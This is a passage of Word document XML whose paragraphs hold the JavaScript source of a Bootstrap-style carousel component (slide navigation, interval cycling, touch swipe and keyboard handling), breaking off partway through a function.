    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    ITEM: 'carousel-item',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    POINTER_EVENT: 'pointer-event'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Selector$2 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    ACTIVE: '.active',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    ACTIVE_ITEM: '.active.carousel-item',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    ITEM: '.carousel-item',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    ITEM_IMG: '.carousel-item img',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    NEXT_PREV: '.carousel-item-next, .carousel-item-prev',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    INDICATORS: '.carousel-indicators',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DATA_SLIDE: '[data-slide], [data-slide-to]',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DATA_RIDE: '[data-ride="carousel"]'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PointerType = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    TOUCH: 'touch',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    PEN: 'pen'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/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Carousel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Carousel(element, config) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._items = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._interval = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._activeElement = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._isPaused = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._isSliding = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this.touchTimeout = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this.touchStartX = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this.touchDeltaX = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._config = this._getConfig(config);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  this._indicatorsElement = this._element.querySelector(Selector$2.INDICATORS);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._touchSupported = 'ontouchstart' in document.documentElement || navigator.maxTouchPoints &gt; 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._pointerEvent = Boolean(window.PointerEvent || window.MSPointerEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._addEventListeners();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Carousel.prototype;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_proto.next = function next() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!this._isSliding) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._slide(Direction.NEXT);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_proto.nextWhenVisible = function nextWhenVisible() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      // Don't call next when the page isn't visible</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      // or the carousel or its parent isn't visible</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!document.hidden &amp;&amp; $(this._element).is(':visible') &amp;&amp; $(this._element).css('visibility') !== 'hidden') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this.next();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_proto.prev = function prev() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!this._isSliding) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._slide(Direction.PREV);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/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_proto.pause = function pause(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._isPaused = true;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(this._element.querySelector(Selector$2.NEXT_PREV)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        Util.triggerTransitionEnd(this._element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this.cycle(true);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clearInterval(this._interval);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._interval = null;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_proto.cycle = function cycle(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._isPaused = false;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(this._interval) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        clearInterval(this._interval);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._interval = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/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(this._config.interval &amp;&amp; !this._isPaused) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._interval = setInterval((document.visibilityState ? this.nextWhenVisible : this.next).bind(this), this._config.interval);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_proto.to = function to(index)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this._activeElement = this._element.querySelector(Selector$2.ACTIVE_ITEM);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var activeIndex = this._getItemIndex(this._activeElement);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (index &gt; this._items.length - 1 || index &lt; 0)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(this._isSliding) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(this._element).one(Event$2.SLID, function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          return _this.to(index);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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      if (activeIndex === index) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this.pause();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this.cycle();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direction = index &gt; activeIndex ? Direction.NEXT : Direction.PREV;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._slide(direction, this._items[index]);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$(this._element).off(EVENT_KEY$2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $.removeData(this._element, DATA_KEY$2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._items = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._config = null;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  this._interval = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._isPaused = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._isSliding = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._activeElement = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._indicatorsElement = null;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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    _proto._getConfig = function _getConfig(config) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      config = _objectSpread({}, Default, config);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      Util.typeCheckConfig(NAME$2, config, DefaultType);</w:t>
      </w:r>
    </w:p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_proto._handleSwipe = function _handleSwipe() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var absDeltax = Math.abs(this.touchDeltaX);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (absDeltax &lt;= SWIPE_THRESHOLD)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direction = absDeltax / this.touchDeltaX; // swipe left</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (direction &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this.prev();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      } // swipe right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if (direction &lt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this.next();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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    _proto._addEventListeners = function _addEventListeners()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if (this._config.keyboard) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(this._element).on(Event$2.KEYDOWN, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          return _this2._keydown(event);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(this._config.pause === 'hover') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(this._element).on(Event$2.MOUSEENTER, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          return _this2.pause(event);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        }).on(Event$2.MOUSELEAVE, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          return _this2.cycle(event);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(this._config.touch) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._addTouchEventListeners();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_proto._addTouchEventListeners = function _addTouchEventListeners() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var _this3 = this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      if (!this._touchSupported)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start = function start(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (_this3._pointerEvent &amp;&amp; PointerType[event.originalEvent.pointerType.toUpperCase()]) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          _this3.touchStartX = event.originalEvent.clientX;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        } else if (!_this3._pointerEvent) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          _this3.touchStartX = event.originalEvent.touches[0].clientX;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var move = function move(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        // ensure swiping with one touch and not pinching</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (event.originalEvent.touches &amp;&amp; event.originalEvent.touches.length &gt; 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          _this3.touchDeltaX = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        } else {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          _this3.touchDeltaX = event.originalEvent.touches[0].clientX - _this3.touchStartX;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var end = function end(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (_this3._pointerEvent &amp;&amp; PointerType[event.originalEvent.pointerType.toUpperCase()]) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          _this3.touchDeltaX = event.originalEvent.clientX - _this3.touchStartX;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_this3._handleSwipe();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (_this3._config.pause === 'hover') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          // If it's a touch-enabled device, mouseenter/leave are fired as</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          // part of the mouse compatibility events on first tap - the carousel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          // would stop cycling until user tapped out of it;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          // here, we listen for touchend, explicitly pause the carousel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          // (as if it's the second time we tap on it, mouseenter compat event</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          // is NOT fired) and after a timeout (to allow for mouse compatibility</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          // events to fire) we explicitly restart cycling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          _this3.pause();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          if (_this3.touchTimeout) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            clearTimeout(_this3.touchTimeout);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_this3.touchTimeout = setTimeout(function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            return _this3.cycle(event);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          }, TOUCHEVENT_COMPAT_WAIT + _this3._config.interval);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$(this._element.querySelectorAll(Selector$2.ITEM_IMG)).on(Event$2.DRAG_START, function (e) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return e.preventDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._pointerEvent) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(this._element).on(Event$2.POINTERDOWN, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          return start(event);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$(this._element).on(Event$2.POINTERUP, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          return end(event);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._element.classList.add(ClassName$2.POINTER_EVENT);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$(this._element).on(Event$2.TOUCHSTART, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          return start(event);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$(this._element).on(Event$2.TOUCHMOVE, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          return move(event);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$(this._element).on(Event$2.TOUCHEND, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          return end(event);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_proto._keydown = function _keydown(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      if (/input|textarea/i.test(event.target.tagName))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switch (event.which) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        case ARROW_LEFT_KEYCODE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          event.preventDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          this.prev();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        case ARROW_RIGHT_KEYCODE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          event.preventDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          this.next();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        default: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_proto._getItemIndex = function _getItemIndex(element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._items = element &amp;&amp; element.parentNode ? [].slice.call(element.parentNode.querySelectorAll(Selector$2.ITEM)) : [];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return this._items.indexOf(element);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_proto._getItemByDirection = function _getItemByDirection(direction, activeElement) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      var isNextDirection = direction === Direction.NEXT;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var isPrevDirection = direction === Direction.PREV;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var activeIndex = this._getItemIndex(activeElement);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var lastItemIndex = this._items.length - 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var isGoingToWrap = isPrevDirection &amp;&amp; activeIndex === 0 || isNextDirection &amp;&amp; activeIndex === lastItemIndex;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
